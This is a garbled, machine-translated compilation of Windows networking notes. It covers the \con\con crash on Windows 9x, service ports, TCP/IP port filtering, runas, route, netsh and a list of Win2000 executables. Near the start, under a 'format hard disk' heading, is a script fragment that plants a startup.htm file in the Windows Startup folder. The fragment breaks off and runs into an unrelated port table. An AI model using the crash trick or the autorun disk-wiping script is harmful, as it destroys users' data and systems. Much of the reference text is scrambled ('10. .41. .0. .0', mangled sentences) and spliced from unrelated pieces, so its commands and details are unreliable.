WINDOWS9x的\con\con设备名称解析漏洞允许用户进行攻击,倒是98死机。原理:我们知道,CON是DOS下的特殊设备名,不允许做文件名,如果我们在DOS下键入如下命令:copy coldcrysky.txt con,系统会显示coldcrysky.txt的内容,如果换成:copy coldcrysky.txt>con系统会提示文件不能拷贝到文件自身。如果吧con换成LPT或PRN,则输出coldcrysky.txt到打印机。由此可见,CON代表文件本身,如果使用\CON\CON命令,则意味着系统不断调用文件本身,视系统资源迅速枯竭,连按CTRL+ALT+DEL的机会都没有~
解决办法:
对于9X系统,强烈建议打补丁!!!2000和XP则不会死机~
D、格式化硬盘:(最恐怖的~~~慎用!!!请勿用于非法用途!!!使用后如果有任何负作用,后果自负!与伤寒天空『ColdCrySky』;乱刀留影无关!!!)
scr,Reset();
scr.Path="C:\\WINDOWS\\StartMenu\\Programs\\启动\\startup.htm";
scr.Doc="
7 UDP Echo Simple TCP / IP services. .
9 TCP Discard the simple TCP/IP services.
9 UDP Discard Simple TCP / IP services. .
13 TCP Daytime simple TCP/IP services.
13 UDP Daytime Simple TCP / IP services. .
17 TCP Quotd simple TCP/IP services.
17 UDP Quotd simple TCP / IP services. .
19 TCP Chargen simple TCP/IP services.
19 UDP Chargen Simple TCP / IP services. .
20 TCP FTP default data FTP Publishing service.
21 TCP FTP control FTP Publishing Service. .
21 TCP FTP control application layer gateway service.
23 TCP Telnet Telnet. .
25/TCP SMTP Simple Mail Transfer Protocol.
25 UDP SMTP Simple Mail Transfer Protocol. .
25 TCP SMTP Exchange Server 。.
25 UDP SMTP Exchange Server. .
42 TCP WINS replication Windows Internet name service.
42 UDP WINS Replication Windows Internet Name Service. .
53 TCP DNS the DNS server.
53 UDP DNS DNS server. .
53 TCP DNS the Internet Connection Firewall "> _blank/Internet connection sharing.
53 UDP DNS Internet connection _blank "> Firewall / Internet Connection Sharing..
67 UDP DHCP server to the DHCP server.
67 UDP DHCP server Internet connection _blank "> Firewall / Internet Connection Sharing..
69 UDP TFTP Trivial FTP daemon services.
80 TCP HTTP Windows Media Services. .
80 TCP HTTP www publishing service.
80 TCP HTTP SharePoint Portal Server. .
TCP 88 Kerberos Kerberos Key Distribution Center.
88 UDP Kerberos Kerberos Key Distribution Center. .
102 X TCP. Microsoft Exchange MTA Stacks .400.
110 TCP POP3 Microsoft POP3 service. .
110 TCP POP3 Exchange Server 。.
119 TCP NNTP Network News Transfer Protocol. .
123 UDP NTP Windows Time 。.
123 UDP SNTP Windows Time. .
135 TCP RPC message to the queue.
135 TCP RPC Remote Procedure Call. .
135 TCP RPC Exchange Server 。.
137 TCP NetBIOS name resolution computer browser. .
137 UDP NetBIOS name resolution computer browser.
137 TCP NetBIOS Name Resolution Server. .
137 UDP Server NetBIOS name resolution.
137 TCP NetBIOS Name Resolution Windows Internet Name Service. .
137 UDP NetBIOS name resolution Windows Internet name service.
137 TCP NetBIOS Name Resolution Net Logon. .
UDP 137 Net Logon NetBIOS name resolution.
137 TCP NetBIOS Name Resolution Systems Management Server 2. .0. .
137 UDP NetBIOS name resolution Systems Management Server 2. .0.
138 UDP NetBIOS Datagram Service Computer Browser. .
138 UDP NetBIOS datagram service Messenger.
138 UDP NetBIOS Datagram Service server. .
138 UDP NetBIOS datagram service Net Logon.
138 UDP NetBIOS Datagram Service Distributed File System. .
138 UDP NetBIOS datagram service Systems Management Server 2. .0.
138 UDP NetBIOS Datagram Service License Logging Service. .
139 TCP NetBIOS session service computer browser.
139 TCP NetBIOS Session Service Fax Service. .
139 TCP NetBIOS session service performance logs and alerts.
139 TCP NetBIOS Session Service Print Spooler. .
139 TCP NetBIOS session service server.
139 TCP NetBIOS Session Service Net Logon. .
139 TCP NetBIOS session service remote procedure call Locator.
139 TCP NetBIOS Session Service Distributed File System. .
139 TCP NetBIOS session service Systems Management Server 2. .0.
139 TCP NetBIOS Session Service License Logging Service. .
143 TCP IMAP Exchange Server 。.
161 UDP SNMP SNMP service. .
162 outbound UDP SNMP trap SNMP trap service.
389 TCP LDAP Server Local Security Authority. .
UDP 389 LDAP server in the local security authority.
389 TCP LDAP Server Distributed File System. .
UDP 389 LDAP server distributed file system.
443 TCP HTTPS HTTP SSL. .
HTTPS 443 TCP World Wide Web publishing service.
443 TCP HTTPS SharePoint Portal Server. .
TCP 445 SMB fax service.
445 UDP SMB Fax Service. .
TCP 445 SMB print spooler.
445 UDP SMB print spooler. .
TCP 445 SMB server.
445 UDP SMB server. .
TCP 445 SMB remote procedure call Locator.
445 UDP SMB Remote Procedure Call Locator. .
TCP 445 SMB distributed file system.
445 UDP SMB Distributed File System. .
TCP 445 SMB license logging service.
445 UDP SMB License Logging Service. .
UDP 500 ISAKMP IPSec IPSec.
515 TCP LPD TCP / IP print server. .
548 TCP Macintosh file server Macintosh file server.
554 TCP RTSP Windows Media Services. .
NNTP over SSL 563 TCP network News Transfer Protocol.
593 TCP RPC over HTTP remote procedure call. .
593 TCP RPC over HTTP Exchange Server 。.
636 TCP LDAP SSL Local Security Authority. .
636 UDP LDAP SSL local security authority.
993 TCP IMAP over SSL Exchange Server. .
995 TCP POP3 over SSL Exchange Server 。.
1270 TCP MOM-Encrypted Microsoft Operations Manager 2000. .
1433 TCP SQL over TCP Microsoft SQL Server 。.
1433 TCP SQL over TCP MSSQL $ UDDI. .
1434 UDP SQL Probe Microsoft SQL Server 。.
1434 UDP SQL Probe MSSQL $ UDDI. .
1645 legacy RADIUS UDP Internet authentication service.
1646 UDP old RADIUS Internet Authentication Service. .
1701 UDP L2TP routing and remote access.
1723 TCP PPTP Routing and Remote Access. .
1755 TCP MMS Windows Media Services.
1755 UDP MMS Windows Media Services. .
1801 TCP MSMQ message queues.
1801 UDP MSMQ message queue. .
1812 UDP RADIUS authentication Internet authentication service.
1813 UDP RADIUS Accounting Internet Authentication Service. .
1900 UDP SSDP SSDP Discovery service.
2101 TCP MSMQ-DC message queue. .
2103 TCP MSMQ-RPC message queuing.
2105 TCP MSMQ-RPC Message Queuing. .
2107 TCP MSMQ-Mgmt Message Queuing.
2393 TCP OLAP Services 7. .0 SQL Server: lower OLAP client support. .
2394 TCP OLAP Services SQL Server 7. .0: downlevel client support OLAP.
2460 UDP MS Theater Windows Media Services. .
2535 UDP MADCAP DHCP server.
2701 TCP SMS Remote Control (control) SMS Remote Control Agent. .
SMS remote control 2701 UDP (controls) for the SMS remote control agent.
2702 TCP SMS Remote Control (data) SMS Remote Control Agent. .
SMS remote control 2702 UDP (data) SMS remote control agent.
2703 TCP SMS Remote Chat SMS Remote Control Agent. .
2703 UPD SMS Remote Chat SMS remote control agent.
2704 TCP SMS Remote File Transfer SMS Remote Control Agent. .
2704 UDP remote file transfer SMS SMS remote control agent.
2725 TCP SQL Analysis Services SQL Analysis Server. .
2869 TCP UPNP Universal Plug and Play device host.
2869 TCP SSDP event notification SSDP Discovery Service. .
TCP 3268 global catalog servers in the local security authority.
3269 TCP Global Catalog Server Local Security Authority. .
3343 UDP cluster service cluster service.
Terminal Services 3389 TCP NetMeeting Remote Desktop Sharing. .
3389 TCP Terminal Services Terminal Services.
3527 UDP MSMQ-Ping message queue. .
4011 UDP BINL remote installation.
4500 UDP NAT-T Routing and Remote Access. .
5000 TCP SSDP old event notification SSDP Discovery service.
5004 UDP RTP Windows Media Services. .
5005 UDP RTCP Windows Media Services.
42424 TCP ASP. . Net Session State ASP. . NET State Service. .
51515 TCP MOM-Clear Microsoft Operations Manager 2000 。.
Second, close the port. .
Restrict the port guards against unlawful invasion [share].
Generally speaking, we use a number of powerful anti-illegal software and firewalls to ensure that our system security, and this paper a simple way - by restricting the port to help you prevent the illegal invasion. .
Unlawful invasion of the way.
Simply, the illegal invasion of way can be roughly divided into four kinds:. .
1. scan ports through a known Bug in the host system.
2, plant Trojan horse, opening the rear door using the Trojan host. .
3. using the means of data overflow, forcing the host to provide a backdoor into the host.
4, the use of certain software design flaws, directly or indirectly control the host. .
The main method of the illegal invasion is the first two, particularly the use of some of the popular hacker tools, through the first attack hosts the largest number and most prevalent; the latter two methods, only some skilled hackers use effects, but as long as both of these problems, the software vendor will soon provide a patch to fix the system in a timely manner.
Therefore, if the illegal invasion to limit the first two methods can effectively prevent the use of hacking tools illegal invasion. And the illegal invasion of the first two methods have one thing in common, that is, enter the host through the port. .
Port is like a House (servers) with several doors, a different door leads to the different rooms (Server provides different services). We used the default port 21 for FTP, and WWW page general default port is 80. But some sloppy network administrators often open easily penetrated the port services, such as 139; there are also some Trojans, such as ice, BO, wide, and so on are all automatically opened a port you unaware. So, as long as we see ourselves not to port all blocked, not to eliminate both illegal intrusion?.
Restrict port approach. .
For individual users, you can restrict all ports, because you do not let your machine's external provision of any service; for external Web Services server, we need to put the port must be used (e. g. WWW port 80, FTP port 21, mail services, port 25, 110, etc.) and opening up, the other port is turned off.
Here, for the use of Windows 2000 or Windows XP users who do not need to install any other software, can use the "TCP / IP filtering" feature limits the server's port. The setting is as follows:. .
1. right click on the "my network places" and select "Properties", and then double-click the "local area connection" (if this is a dial-up Internet user, select the "my connection" icon) to pop up the "local area connection status" dialog box.
2, click [Properties] button, pop-up "Local Connection Properties", select the "This connection uses the following items" in the "Internet Protocol (TCP / IP)", then click [Properties] button. .
3. in the pop-up "Internet Protocol (TCP/IP)" in the dialog box, click the [Advanced] button. In the "Advanced TCP/IP settings", select "options" tab, select the "TCP/IP filtering", and then click [Properties] button.
4, in the pop-up "TCP / IP Filter" dialog, select "Enable TCP / IP filtering" check box, and then to the left of "TCP port" on the "only allow" selected. .
。.
This way, you can add or delete your own since the TCP or UDP, or IP range of port. .
Add or delete is completed, reboot the machine after your server is protected.
Finally, remind the individual user, if you only browse the Internet, they can not add any port. But to make use of some network communication tools, such as OICQ, then it should be "4000" to open the port, the same token, if we find a common network tools do not work when you please see if it hosts the opening of the port and then "TCP / IP" in the open this port. .
21: 00: 57 | comments | Permalink | Trackback (0) | blog | network applications.
Network Terminology 2. .
If you want to use a domain administrator to use this command, type one of the following parameters.
/ User: AdministratorAccountName @ DomainName. .
/useromainName\AdministratorAccountName 。.
runas command allows you to run the program (*.. exe), saved MMC console (*.. msc), procedures and save the MMC console shortcuts and "Control Panel" item. As another group (such as "Users" or "Power Users" group) members log on to the computer, you can run as an administrator. .
You can use the runas command to start any program, MMC controller or the "Control Panel". As long as you provide the appropriate user account and password information, the user account has the ability to log on to the computer, and the program, MMC console, "" Control Panel "entry in the system and to the user account is available.
runas command allows you to manage other domains of the server (the computer and run the tool to manage the server in a different domain). .
If you try to use runas from the network location to start a program, MMC console, or the "Control Panel", may be used to connect to the network share, the credentials used to start the program are different. The latter credentials may not be able to access the same network share.
Some items, such as "Printers" folder and desktop items, indirectly from Windows 2000 to open, but can not use the runas command. .
If the runas command fails, then it is likely that you do not run the RunAs service or use of the user account is not valid. To check the status of the RunAs service, in the "computer management", click "services and applications", and then click the "services". To test user account, please try to use the appropriate domain account to log in.
Example. .
To as an administrator on the local computer to start Windows 2000 an instance of the command prompt, type:.
runas / user: localmachinename \ administrator cmd. .
When prompted, type the administrator password.
To use the named companydomain \ domainadmin the domain administrator account, start the "Computer Management" snap-in instance, type:. .
runas /user:companydomain\domainadmin "mmc %windir%\system32\compmgmt。.msc" 。.
When prompted, type the account password. .
To use the named domain. .microsoft .com domain., by the domain administrator account user starts an instance of "Notepad", type:.
runas / user: user @ domain. . Microsoft. . Com "notepad my_file.. Txt". .
When prompted, type the account password.
To start a command prompt window, saved MMC console, Control Panel items or of any other place an instance of the server program, type:. .
runas /netonly /user:domain\username "command" 。.
domain \ username must have sufficient user rights management server. When prompted, type the account password. .
Route 。.
In the local IP routing table display and modify the entries. Use the route without parameters to display help. .
Syntax.
route [-f] [-p] [Command [Destination] [mask Netmask] [Gateway] [metric Metric]] [if Interface]]. .
Parameter.
-F. .
Clear all is not a primary route (netmask 255. .255. .255. .255 route), the loopback network route (target = 127. .0 .0 .0.., netmask 255. .255. .255. .0 routing) or multicast routing (target = 224. .0 .0 .0.., netmask 240. .0 .0 .0.. routing) entries in the routing table. If it is one of the commands (such as add, change, or delete), the table before running the command to clear.
-P. .
And add the command to use when the specified route is added to the registry and whenever the TCP/IP protocol is started to initialize the IP routing table. By default, when you start a TCP/IP protocol does not save the added route. And when used with the print command, display persistent route list. All other commands are ignored for this parameter. . .
Command 。.
Designated to run the command. The following table lists valid command. Command purposes. .
Add adds a route.
change to change the existing route. .
Delete Deletes a route.
print print routing. .
Destination 。.
Designated route network destination address. Destination address can be an IP network address (network address which the host address bits set to 0), the main route is the IP address for the default route is 0. .0. .0. .0. .
mask subnetmask 。.
Specify the target address associated with the network's subnet mask (also known as the subnet mask). Subnet mask for the IP network address can be an appropriate subnet mask for the host route is 255. .255. .255. .255, For the default route is 0. .0. .0. .0. If omitted, use the subnet mask 255. .255. .255. .255. Since the definition of routing destination address and subnet mask the relationship between the destination address can not be more than its corresponding subnet mask details. In other words, if a subnet mask is 0, then the destination address of the corresponding bits can not be set to 1. .
Gateway 。.
Specified by the network over the definition of goals and subnet mask address set up to the previous or next hop IP address. For local connections from the subnet, gateway address is assigned to the connection interface IP subnet address. For to go through one or more routers can be used in remote routing, gateway address is assigned to the neighboring router, directly to the IP address. .
metric Metric 。.
Required for the routing metric specified integer value (range is 1 to 9999), which is used in the routing table to select multiple routing and forwarding packets of the destination address matches the best route. The selected route has the least metric. Metric to reflect the number of hops, the speed of the path, path reliability, path throughput, and management of property. .
if Interface 。.
Specify the target can reach the interface index of the interface. Use the route print command to display interface and the corresponding interface index of the list. Interface index can be used for decimal or hexadecimal value. For hexadecimal values, in front of the hexadecimal number with 0x. Ignored if parameters, the interface established by the gateway address. .
/? 。.
Displays help at the command prompt. .
Comments.
Routing table, the value of a metric is due to allow larger TCP / IP LAN interface of each IP address, subnet mask and default gateway configuration automatically determine the routing table, routing metric result. Automatically determine the default boot interface metric to determine the speed of each interface, adjusted the route metric for each interface, so the fastest interface creates the routes with the lowest metric. To remove the large metric, each LAN connection TCP / IP protocol to disable the advanced properties automatically determines the interface metric. .
If in the systemroot\System32\Drivers\Etc folder on the local network file in the appropriate entry, name can be used for Destination. As long as the name of the domain name system by "" (DNS) queries the standard host name resolution techniques into an IP address, it can be used to Gateway, DNS queries stored in the systemroot\System32\Drivers\Etc folder under the local hosts file, and NetBIOS name resolution.
If it is print or delete command, you can ignore the Gateway parameter, use the wildcard character to represent the target and the gateway. Destination of the value can be by the asterisk (*) wildcard specified. If the specified target contains an asterisk (*) or question mark (?), It is seen as a wildcard, only to print or delete the matching target route. Asterisk on behalf of any one sequence of characters, question mark on behalf of any of the characters. For example, 10. .*. .1, 192. .168. .*, 127. .* And * 224 * is the effective use of the asterisk wildcard. .
Using an invalid destination and subnet mask (netmask) to display the "Route: bad gateway address netmask" error message. Target one or more bits set to 1, and in the subnet mask of the corresponding bit is set to 0, this error occurs. Through the binary representation of an object that represents the destination and the subnet mask to check this. The binary representation of the subnet mask that represents the destination network address including the part of a series of objective 1 and indicates the host address portion of a series of 0 in two parts. . .
Only Windows NT 4. Windows 2000, .0, Windows Millennium Edition and Windows XP-route command supports the-p parameter. Windows 95 or Windows 98 of route command does not support this argument.
Only when the Internet Protocol (TCP / IP) protocol is installed in the network connection properties for the network adapter component, the command can be used. .
Paradigm.
To display the full contents of IP routing table, type:. .
route print 。.
To display the IP routing table 10. . Started routing, type:. .
route print 10。.* 。.
To add a default gateway address 192. .168. .12. .1 The default route, type:. .
route add 0。.0。.0。.0 mask 0。.0。.0。.0 192。.168。.12。.1 。.
To add a goal of 10. .41. .0. .0, Subnet mask is 255. .255. .0. .0, The next hop address is 10. .27. .0. .1 Routing, type:. .
route add 10。.41。.0。.0 mask 255。.255。.0。.0 10。.27。.0。.1 。.
To add a goal of 10. .41. .0. .0, Subnet mask is 255. .255. .0. .0, The next hop address is 10. .27. .0. .1 Permanent routing, type:. .
route -p add 10。.41。.0。.0 mask 255。.255。.0。.0 10。.27。.0。.1 。.
To add a goal of 10. .41. .0. .0, Subnet mask is 255. .255. .0. .0, The next hop address is 10. .27. .0. .1, 7 metric routing, type:. .
route add 10。.41。.0。.0 mask 255。.255。.0。.0 10。.27。.0。.1 metric 7 。.
To add a goal of 10. .41. .0. .0, Subnet mask is 255. .255. .0. .0, The next hop address is 10. .27. .0. .1, The interface index 0x3 route, type:. .
route add 10。.41。.0。.0 mask 255。.255。.0。.0 10。.27。.0。.1 if 0x3 。.
To delete a target of 10. .41. .0. .0, Subnet mask is 255. .255. .0. .0 Routing, type:. .
route delete 10。.41。.0。.0 mask 255。.255。.0。.0 。.
To delete IP routing table 10. . Started all the routing, type:. .
route delete 10。.* 。.
To target 10. .41. .0. .0, Subnet mask is 255. .255. .0. .0 Routing of the next hop address 10. .27. .0. .1 Changed to 10. .27. .0. .25, Type:. .
route change 10。.41。.0。.0 mask 255。.255。.0。.0 10。.27。.0。.25 。.
How windowsserver change the ip address of cmd ■ ■ ■ -> Windows 2k/2003 Server. .
At the command line to change the ip address.
Windows2000 is now more popular operating system, its function is very powerful, it can even be the same as the Unix command line to do a lot of work. Following a kind of change in the ip address command line method, is introduced to us (in parentheses is the number of notes in bold type is manual entry of):. .
C:\ > ipconfig (first using the ipconfig command to take a look at the change IP address before).
Windows 2000 IP Configuration. .
Ethernet adapter local area connection:.
Connection-specific DNS Suffix. .:. .
IP Address。. : 10. .1 .1.. .94 (local connection changes before the ip).
Subnet Mask. .: 255. .255. .255. .0. .
Default Gateway 。. : 10. .1 .1.. .254.
C: \> netsh (enter setting mode). .
netsh>interface 。.
interface> ip. .
Interface ip set address > local area connection "static .1 .1 10... .111 255. .255. .255. .0 .1 .1 10... .254.
interface ip> exit. .
Set command earlier in this paper are as follows: more detailed explanation.
set address - set the specified interface IP address and default gateway. .
Set dns-DNS server mode and address.
set wins - set the WINS server mode and addresses. .
C:\ > ipconfig (change with ipconfig command to look, to confirm whether the change is successful).
2000 IP Configuration. .
Ethernet adapter local area connection:.
Connection-specific DNS Suffix. .:. .
IP Address。. : 10. .1 .1.. .111.
Subnet Mask. .: 255. .255. .255. .0. .
Default Gateway 。. : 10. .1 .1.. .254.
Command list. .
-Moves to the previous context level.
? - Display list of commands. .
Aaaa-changes to the aaaa ' context would.
abort - discarded in the offline mode changes. .
Add-Add a configuration item to add to the project list.
alias - add an alias. .
Bye-exit the program.
commit - presented in the offline mode changes. .
Delete-Deletes the item list for a configuration item.
dhcp - Changes to `dhcp 'context. .
Dump-displays a configuration script.
exec - run a script file. .
Exit-exit the program.
help - Displays command list. .
Interface-interface ' would change to the context.
offline - set off the current model. .
Online-sets the current mode to online.
popd - to open a context from the stack. .
Pushd-pushes current context on stack.
quit - exit the program. .
Ras-change into ras ' context would.
routing - Changes to the `routing 'context. .
Set-update configuration settings.
show - display information. .
To delete an alias unalias-.
wins - Changes to the `wins' context. .
Route command.
routing ip add / delete / set / show interface in the specified interface to add, delete, or display of conventional IP routing configuration settings. .
Routing ip add/delete/set/show filter to the specified interface adds, deletes, configures, or displays the IP packet filters.
routing ip add / delete / show boundary in the specified interface to add, delete or display the multicast boundary setting. .
Routing ip add/set ipiptunnel add or configure IP-in-IP interfaces.
routing ip add / delete / set / show rtmroute add, configure or display the routing table does not continue routing manager. .
Routing ip add/delete/set/show persistentroute adds, deletes, configures, or displays a continuous route.
routing ip add / delete / set / show preferenceforprotocol add, delete, configure or display the priority of routing protocols. .
Routing ip add/delete/set/show scope to add, delete, or display the multicast scope.
routing ip set / show loglevel configuration or display the global IP record levels. .
Routing ip show all IP helper displays the Netsh utility sub environment.
routing ip show protocol shows all running IP routing protocols. .
Routing ip show mfe displays multicast forwarding entries.
routing ip show mfestats display multicast forwarding the survey. .
Routing ip show boundarystats displays IP multicast boundaries.
routing ip show rtmdestinations show route table routing table manager in the target. .
Routing ip show rtmroutes displays route table manager in the routing table.
routing ip nat set / show global configuration or display the global network address translation (NAT) settings. .
Routing ip nat add/delete/set/show interface adds, deletes, configures, or displays the specified interface of the NAT settings.
routing ip nat add / delete addressrange interfaces in the NAT pool of public addresses to add or delete an address range. .
Routing ip nat add/delete addressmapping adds or deletes a NAT address mapping.
routing ip nat add / delete portmapping add or remove NAT port mapping. .
Routing ip autodhcp set/show global configures or displays global DHCP allocator parameters.
routing ip autodhcp set / show interface interface configuration or display the specified set DHCP allocator. .
Routing ip autodhcp add/delete exclusion in a range of addresses that the DHCP allocator in Add or remove an exclusion range.
routing ip dnsproxy set / show global configuration or display the global DNS proxy parameters. .
Routing ip dnsproxy set/show interface configures or displays the specified interface of the DNS proxy parameters.
routing ip igmp set / show global IGMP configuration or display the global settings. .
Routing ip igmp add/delete/set/show interface in the specified interface adds, deletes, configures, or displays IGMP.
routing ip igmp add / delete staticgroup add or delete the specified interface, the static multicast group. .
Routing ip igmp show grouptable shows the IGMP hosts group table.
routing ip igmp show ifstats show IGMP statistics for each interface. .
Routing ip igmp show iftable shows each interface IGMP host groups.
routing ip igmp show proxygrouptable display IGMP proxy interface IGMP group table. .
Routing ip igmp show rasgrouptable displays the remote access server uses the Internet interface of the Group of tables.
routing ip ospf set / show global show global OSPF configuration or settings. .
routing ip ospf add/delete/set/show i 。.
Windows. .
Nterface for a specified interface adds, deletes, configures, or displays OSPF.
routing ip ospf add / delete / set / show area to add, delete, configure or display OSPF area. .
Routing ip ospf add/delete/show range in the specified OSPF area adds, deletes, configures, or displays of coverage.
routing ip ospf add / delete / set / show virtif add, delete, configure or display OSPF virtual interface. .
Routing ip ospf add/delete/show neighbor adds, deletes, configures, or displays OSPF neighbors.
routing ip ospf add / delete / show protofilter add, delete, configure or display the routing OSPF external routing information sources. .
Routing ip ospf add/delete/show routefilter adds, deletes, configures, or displays OSPF route filter external routes.
routing ip ospf show areastats display OSPF area statistics. .
Routing ip ospf show lsdb Displays OSPF link state database.
routing ip ospf show virtifstats display OSPF virtual link statistics. .
Routing ip relay set global configuration "DHCP relay agent global settings the program".
routing ip relay add / delete / set interface in the specified interface to add, delete, or configure the "DHCP Relay Agent" setting. .
Routing ip relay add/delete dhcpserver in DHCP server address list in the Add or remove the IP address of the DHCP server.
routing ip relay show ifbinding display interface IP address binding. .
Routing ip relay show ifconfig show ifstats "DHCP relay agent" in the configuration.
routing ip relay show ifstats display DHCP statistics for each interface. .
Routing ip rip set/show global configuration IP RIP global settings.
routing ip rip add / delete / set / show interface in the specified IP interface to add or configure the RIP settings. .
Routing ip rip add/delete peerfilter adds or removes a RIP peer filters.
routing ip rip add / delete acceptfilter receiving the routing list to add or remove RIP routing filter. .
Routing ip rip add/delete announcefilter announced the routing list, add or remove RIP route filters.
routing ip rip add / delete / show neighbor add or remove RIP neighbors. .
Routing ip rip set/show flags for a specified interface IP RIP is configured on the advanced settings.
routing ip rip show globalstats display global RIP parameters. .
Routing ip rip show ifbinding displays IP address bindings for an interface.
routing ip rip show ifstats display RIP statistics for each interface. .
IPX netsh routing commands.
routing ipx add / set staticroute in the IPX routing table to add or configure a static IPX route. .
Add/set ipx routing staticservice in the SAP service table to add or configure a static SAP services.
routing ipx add / set filter on the specified interface to add or configure the IPX packet filters. .
Add/ipx routing interface in the set demand-dial interfaces enable IPX routing, or IPX settings configured on the interface.
routing ipx set global configuration global IPX routing settings. .
Ipx rip routing add/set filter to add and configure RIP route filters.
routing ipx rip set global configuration global IPX's RIP settings. .
Ipx rip routing set interface on a specified interface to configure IPX RIP settings.
routing ipx sap add / set filter to add or configure the SAP service filters. .
Ipx sap routing set global configuration global IPX SAP settings.
routing ipx sap set interface configuration in the specified IPX's SAP interface settings. .
Ipx routing netbios add nbname static IPX NETBIOS name to the NetBIOS name table.
routing ipx netbios set interface to configure the specified interface, the IPX-based NetBIOS settings. .
NetSh commands for WINS.
WINS list lists all available commands. .
Dump the WINS server configuration is dumped to the command output.
add name registered in the name of the server. For more information, please enter add name /?. .
Add partner adds a replication partner to the server. For more information, please enter add partner/?.
add pngserver Add the current server's Persona Non Grata list of servers. For more information, please enter the add pngserver /?. .
Check database check database consistency. For more information, please enter check database/?.
check name check a WINS server, the name of the record list. For more information, please enter the check name /?. .
Check version number consistency version check. For more information, please enter check version/?.
delete name removed from the server database, the name has been registered. For more information, please enter the delete name /?. .
Delete partner from the list to delete a replication partner. For more information, please enter delete partner/?.
delete records deleted from the server or logical delete all records or a group of records. For more information, please enter the delete records /?. .
Delete list to delete the owner and its owners. For more information, please enter delete owners/?.
delete pngserver removed from the list all or selected Persona Non Grata servers. For more information, please enter the delete pngserver /?. .
Init backup to back up the WINS database. For more information, please enter backup/? init.
init import file to import data from Lmhosts. For more information, please enter the init import /?. .
Init pull the trigger to start a "pull" and sent to another WINS server. For more information, please enter init pull/?.
init pullrange start another WINS server, a group of records, and read the record. For more information, please enter the init pullrange /?. .
Init push start "pushing" triggers, and sending to another WINS server. For more information, please enter init push/?.
init replicate replicated database with replication partners. For more information, please enter the init replicate /?. .
Init restore to restore the database from the file. For more information, please enter init restore/?.
init scavenge the WINS database, remove the server. For more information, please enter the init scavenge /?. .
Init search search server, the WINS database. For more information, please enter a search/? init.
reset statistics reset the server statistics. For more information, please enter the reset statistics /?. .
Set automatic autopartnerconfig set server replication partner configuration information. For more information, please enter set autopartnerconfig/?.
set backuppath set server backup parameters. For more information, please enter the set backuppath /?. .
Setting the server's set burstparam burst handling parameters. For more information, please enter set autopartnerconfig/?.
set logparam set database and event logging options. For more information, please enter the set logparam /?. .
Setting the server's set migrateflag migration flag. For more information, please enter set migrateflag/?.
set namerecord interval and set the server timeout. For more information, please enter the set namerecord /?. .
Setting the server's set periodicdbchecking regularly check parameters for the database. For more information, please enter set periodicdbchecking/?.
set pullpartnerconfig set designated "pull" configuration parameters partners. For more information, please enter the set pullpartnerconfig /?. .
Sets a specified set pushpartnerconfig "pushing" partner configuring parameters. For more information, please enter set pushpartnerconfig/?.
set pullparam set the default server "pull" parameter. For more information, please enter the set pullparam /?. .
Set sets the server default pushparam "pushing" parameter. For more information, please enter set pushparam/?.
set replicateflag set the server copy flag. For more information, please enter the set replicateflag /?. .
Set startversion Sets the database ID of the starting version. For more information, please enter set startversion/?.
show browser shows all the activities the domain master browser [1Bh] records. For more information, please enter the show browser /?. .
Show database displays the specified server's database and records. For more information, please enter the show database/?.
show info display configuration information. For more information, please enter the show info /?. .
Display the server name in the show detailed information for a particular record. For more information, please enter the name/show?.
show partner shows the server "pull" or "push" (or "push-pull") partner. For more information, please enter the show partner /?. .
Show default partner configuring partnerproperties display. For more information, please enter show partnerproperties/?.
show pullpartnerconfig Show "pull" partner configuration information. For more information, please enter the show pullpartnerconfig /?. .
Show pushpartnerconfig show "pushing" partner configuration information. For more information, please enter show pushpartnerconfig/?.
show reccount display the specified number of records owned by the server. For more information, please enter the show reccount /?. .
Show recbyversion displays the specified server. For more information, please enter show recbyversion/?.
show server show the currently selected server. For more information, please enter the show server /?. .
Show statistics show WINS server statistics. For more information, please enter show statistics/?.
show version display the current version of the WINS server, the counter value. For more information, please enter the show version /?. .
Show versionmap displays the owner ID to "maximum version number mapping". For more information, please enter show versionmap/?.
Interface command. .
Interface set/show interface enabled, disabled, connect, disconnect, and display the configuration for demand-dial interface.
interface set / show credentials in the demand-dial interface to configure or display the user name, password and domain name. .
Win2000 command complete.
accwiz. . Exe> Accessibility Wizard for walking you through setting up your machine for your mobility needs. . Aids Wizard. .
acsetups。.exe > ACS setup DCOM server executable 。.
actmovie. . Exe> Direct Show setup tool to install instruments directly displayed. .
append。.exe > Allows programs to open data in specified directories as if they were in the current directory。. Directory of data.
arp. . Exe> NETWORK Display and modify IP - Hardware addresses display and change the computer's IP and hardware physical address corresponding to the list. .
At. a .exe > AT scheduling utility is also included with the task to run UNIX programs.
atmadm. . Exe> Displays statistics for ATM call manager. . ATM Call Manager Statistics. .
Attrib. .exe and modify > Display attributes for files and folders to display and change the file and folder properties.
autochk. . Exe> Used to check and repair Windows File Systems to check and repair the file system. .
Autoconv. .exe file system > Automates the conversion during reboots during the startup process automatic conversion system.
autofmt. . Exe> Automates the file format process during reboots formatting process in the startup process. .
Autolfn. formatting Used for .exe > long file names using a long file name format.
bootok. . Exe> Boot acceptance application for registry. .
bootvrfy。.exe > Bootvrfy。.exe, a program included in Windows 2000 that notifies the system that startup was successful。. Bootvrfy。.exe can be run on a local or remote computer。. Bulletin started successfully.
cacls. . Exe> Displays or modifies access control lists (ACLs) of files. . Display and edit ACL. .
Calc. Windows .exe Calculators > calculator.
cdplayer. . Exe> Windows CD Player CD player. .
> Change .exe change. {User | Port | Logon} and the Terminal Server-related queries.
charmap. . Exe> Character Map Character Map. .
Chglogon. Same as .exe > using "Change Logon" to start or stop the session record.
chgport. . Exe> Same as using "Change Port" to change the port (Terminal Services). .
Chgusr. Same as .exe > "Change User" using change user (Terminal Services).
chkdsk. . Exe> Check the hard disk for errors similar to Scandisk 3 Stages must specify a Drive Letter disk testing procedures. .
Chkntfs. Same as .exe > using chkdsk but for NTFS NTFS disk utility.
cidaemon. . Exe> Component of Ci Filer Service component Ci document service. .
cipher。.exe > Displays or alters the encryption of directories [files] on NTFS partitions。. In NTFS on displays or alters the contents of an encrypted file or directory.
cisvc. . Exe> Content Index - It's the content indexing service for I index the content. .
Ckcnv. Convertor transform .exe > Cookie Cookie.
cleanmgr. . Exe> Disk Cleanup, popular with Windows 98 Disk Cleanup. .
Cliconfg. SQL Server .exe > Client Network Utility SQL client network utility.
clipbrd. . Exe> Clipboard viewer for Local will allow you to connect to other clipboards clipboard viewer. .
Clipsrv. Start the .exe > clipboard Clipboard Server running.
clspack. . Exe> CLSPACK used to create a file listing of system packages list to establish a list of system files. .
Display cluster. .exe > a cluster in a domain the domain of the cluster.
_cmd_. . Exe> Famous command prompt there's really nothing! . .
Cmdl32. .exe > Connection Manager Auto-Download automatically download connection management.
